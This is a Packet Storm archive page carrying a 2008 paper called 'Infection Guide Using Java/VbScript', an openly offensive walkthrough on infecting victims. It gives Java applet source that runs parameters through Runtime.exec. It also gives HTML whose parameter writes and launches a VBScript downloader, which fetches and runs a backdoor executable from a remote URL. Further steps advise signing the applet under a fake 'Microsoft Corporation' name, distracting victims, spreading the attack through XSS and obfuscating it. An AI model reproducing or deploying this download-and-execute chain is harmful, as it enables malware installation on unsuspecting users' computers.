exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Infection Guide Using Java/VbScript

Infection Guide Using Java/VbScript
Posted Dec 12, 2008
Authored by AnalyseR

IGUJV - The Infection Guide Using Java/VbScript.

tags | paper, java
SHA-256 | a538f8839bab1ef1109be3133ef023b39a9e09b143ed21b6e0d555959cfb667a

Infection Guide Using Java/VbScript

Change Mirror Download
########################################################################
# IGUJV - Infection Guide Using Java/VbScript
########################################################################
#
# Hi. This is a minimalistic guide on "how to infect anyone".
# This is not a 0day. It's a pwning method wich is one click away
# from the victim. It is pretty simple and the best of all
# it takes no time at all. (And it is undetectable too if you do it right)
#
########################################################################
#
# Author: AnalyseR
# eMaiL: alienyser@gmail.com
# Greetz to: DarkPaiN, Marianaki_Ki, Franko, Aragorn, __Potter__, Santa_Cruz
#
########################################################################








After a few attempts to think a way to infect specific (or any) computer systems,
i found that Java could be THE solution. I am not a Java Programmer/Developer or whatever
but this piece of code is pretty easy to be read by anyone who had a little programming
expirience. The question "how to infect someone" is the hardest one, when you are coding
your new backdoor/trojan or whatever malware. I mean... ok, you have your new backdoor
compiled. You've tested it and it works great. But how the hell can you spread it???
There are several methods, but nothing is invisible from the user's eye. And that's because
all the well known methods are... WELL KNOWN :)

Ok, let me go with the subject and show you how it's done. I've developed the 80%
of this attack (at least) and i say 80 because the backdoor server i use isn't made by me,
and the vbscript is from a googled page. Anyway, the Java code has been written by me and
the "idea" is also my "product". So be gentle with this :PpPPp.

I won't explain the meaning of what does every single line of code here, because
i don't want to and because you must understand by your self how it works. Any other
explanation on the codes, will be useless if you can't read the source code by your self.
(I speak English by my self for example :Pp noone teached me how it's done. It just happens.)
(Little crappy but i hope you understand anywayz)


##################################### What you need to play with this method ###########################################################

1) The official Java compiler (and the rest of Java developer tools)
2) Basic HTML/Java/VBScripting knowledge
3) Java Runtimes
4) Web Browser
5) Hosting for the tests
6) A backdoor uploaded to your host
7) Mind
8) Coffee

########################################################################################################################################


###################################### The process #####################################################################################

1) Create a java file with the following code inside and name it whatever you want (i faced problems with the THIRD parameter, cut it to the second one or just use it as it is. Works fine for me...).



########################### START COPY HERE ##############################

import java.applet.*;
import java.awt.*;
import java.io.*;
public class skata extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try{
f = Runtime.getRuntime().exec(first);

}
catch(IOException e){
e.printStackTrace();
}
Process s;
String second = getParameter("second");
try{
s = Runtime.getRuntime().exec(second);
}
catch(IOException e){
e.printStackTrace();
}
Process t;
String third = getParameter("third");
try{
t = Runtime.getRuntime().exec(third);
}
catch(IOException e){
e.printStackTrace();
}
}
}

########################### END COPY HERE ##############################



2) Compile your java applet with the java developer tools and sign it too. A good name could be "Microsoft Corporation" or something.
3) Upload your signed/compiled applet to your host and your backdoor too.
4) Open notepad and paste the following html code. (change the YOUR-JAVA-APPLET-NAME with your own java filename)




########################### START COPY HERE ##############################

<applet width='1' height='1' code='YOUR-JAVA-APPLET-NAME.class' archive='YOUR-JAVA-APPLET-NAME.jar'>

<param name='first' value='cmd.exe /c start cmd.exe'>

<param name='second' value='calc.exe'>

</applet>

########################### END COPY HERE ##############################



5) Upload it as .htm to your host and browse it :) You will see the Java Security warning. Click RUN.... BooM! Calculator and cmd spawned!
6) Have in mind that THIS warning comes out in EVERY java applet you are running. EITHER A JAVA GAME or a JAVA IRC CLIENT.
7) Change the .htm code in to something like the following (Take a look, it's a vbscript echoed from cmd.exe - this will download our backdoor).


########################### START COPY HERE ##############################

<applet width='1' height='1' code='YOUR-JAVA-APPLET-NAME.class' archive='YOUR-JAVA-APPLET-NAME.jar'>
<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\update.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://hello.world.com/backdoor.exe C:\windows\update.exe'>
</applet>

########################### END COPY HERE ##############################


8) Note that i use C:\Windows. If you want to infect win2k or vista you might want to change it to %windir% or whatever you want.
9) To see the vbscript code clearly, infect your self and open C:\windows\apsou.vbs ;))) (you don't need to do it at all).
10) Change the backdoor URL on the above html code (http://hello.world.com/backdoor.exe) and the location you want to download it.
11) Fill the page with flash games, pictures, texts. This will keep the victim's mind away ;)
12) Save your new .htm and upload....
13) Now browse it and wait. Wait.. wait.. BOOM! :) Backdoored.
14) You trust an irc client? :) You can be pwned. Without to mention anything. Just by clicking run.
15) If you want some roots, you can change the above script to attack linux users only. (Or you can make 2 different versions)
16) Use it with XSS to infect a lot of people.
17) Use <SCRIPT SRC=""> to include the script, don't let the people see what's inside your page. Remember to change the permissions to.
18) Use multiple unescape functions for your code. This will keep away any suspicious users for a while.







CONCLUSION:
##############

It's big mistake to think that you are safe with your new antivirus or your brand new million-dollar anti-whatever system.
This is not any kind of exploitation. It's just social engineering-like attack. I see 10 of these warnings every day on the net.
Either i want to play a game and kill my time or whatever i want to do with a java applet. It's nothing strange or special than that.
But hello, there is a "hole" on this. You can execute LOCAL, anything you want FOR FUCK'S SAKE! :)
I have a Proof of Concept page out there... it will execute calc.exe and cmd.exe on your computer.

Tested (and working) under Windows XP SP2-SP3, Full Updated, Java Runtimes 5-something...

Proof of concept: http://analyser.overflow.gr/basta/analyser.htm

Enjoy milw0rmers..

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close